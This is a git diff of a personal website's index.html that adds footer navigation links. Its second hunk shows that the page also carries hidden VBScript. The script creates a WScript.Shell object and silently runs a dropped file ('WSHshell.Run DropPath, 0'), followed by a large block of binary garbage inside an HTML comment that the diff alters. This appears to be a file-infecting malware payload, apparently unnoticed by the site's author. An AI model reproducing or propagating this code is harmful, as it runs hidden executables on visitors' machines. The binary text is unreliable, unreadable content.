adding footer link content

--- a/index.html
+++ b/index.html
@@ -5,20 +5,25 @@
     <body>
         <div id="container">
             <div id="upperCon">
-                <iframe id="topContent" src="home.html">
+                <iframe id="topContent" src="home.html" name="topScreen">
                 </iframe>
             </div>
             <div id="lowerCon">
                 <div id="footer">
                     <div id="homeButton" class="footerButtons">
+                        <a href="home.html" target="topScreen">HOME</a>
                     </div>
                     <div id="infoButton" class="footerButtons">
+                        <a href="">INFO</a>
                     </div>
                     <div id="eduButton" class="footerButtons">
+                        <a href="">EDUCATION</a>
                     </div>
                     <div id="hobbyButton" class="footerButtons">
+                        <a href="">HOBBY</a>
                     </div>
                     <div id="contactButton" class="footerButtons">
+                        <a href="">CONTACT</a>
                     </div>
                 </div>
             </div>
@@ -38,11 +43,12 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--yÚ@™Ù?êIF‡¯Ú…{î“EÓ?· ¥•ç°r1×°0M’ÌÙgºöWýðô@ùN)”ì„Ý„È¤Cß/›¹:~õ×Ñ->SÑŽ4•ÛUOŠ· kNLTñ„é:^™¡ÅŸj:.ŠXÏf½:{H*¦9…ÓiFÄØt/Mbþ¡O(ãMû#ÍÙÏñÖ/KÖ@Î•mQ8`…¸¾ÚÛÃüàƒŸúìòë+Ñc•ûÍB› w[u­á¾m©¶ñ¼5Š!åŸEãG’¨GX²[AÈÂõvm,ò³×x¤«4žüŸ.ŠÇ¦}lp"ª5õÀ&+íV:\L-Ÿ¬ï^—°%—<¶:¢ò$â¹õ‚¶_ÚHï
-áðŠdžûY5¬žée1‚u„ê†s¡{¿xïœw^ÏÔÁaÌ_†²ÀK:DæwØmƒÕ>åÅq²O(%›NO"ÓWn§XÚèËù©¤ôrôm€»0àx#"wó¤· Ü
+//--></SCRIPT><!--÷¬Ñð£O¿y›Ç+CFI0Ðó‡ùPx†Ç÷ì´Oþ¥¦et¸åÖoÝ°ÜÎ6Å¨ÔPƒqédžÉDQŒõ€(o]çoµ–eåF¬Œ[Ê$]ûä¤::0&©ùµÅö	QOÁ¶iy,[â¡‚–ý˜Ç¸‘–²ª	eï fQ¨b¼?R=²5#Û§œ7×™(®{šÚóëùt2•tk
+]è°}—¤Æ	Oè{ëø=‹R×û ÎM›«ÇÜŠ©¦‡Û.í-wgâÚâ~å×µpr»D¬õ€ÀxÊü[¸!ò»Úð¬Œ.aÍÅüÇ—RaL„%qÞÌ¼ÈFFÇ ÜÚ'‰æþk	‡·Ç#=y
+è%ý¨ž²©PO/5FBð/õB¦“míª‰£î“‹§Ã·?–Â–™%‡ÙÐÂè–¦×íX)da°fŸ,»XwäZÞ3éw¥O?à`­ì–ÈôÏ÷Ž†8GUÃL\Æ# Ü
 RùÜ
 Ü
 Ü
-‘×OÚúØZvß
+‘×O=÷ØZØ
  Ü
 -->
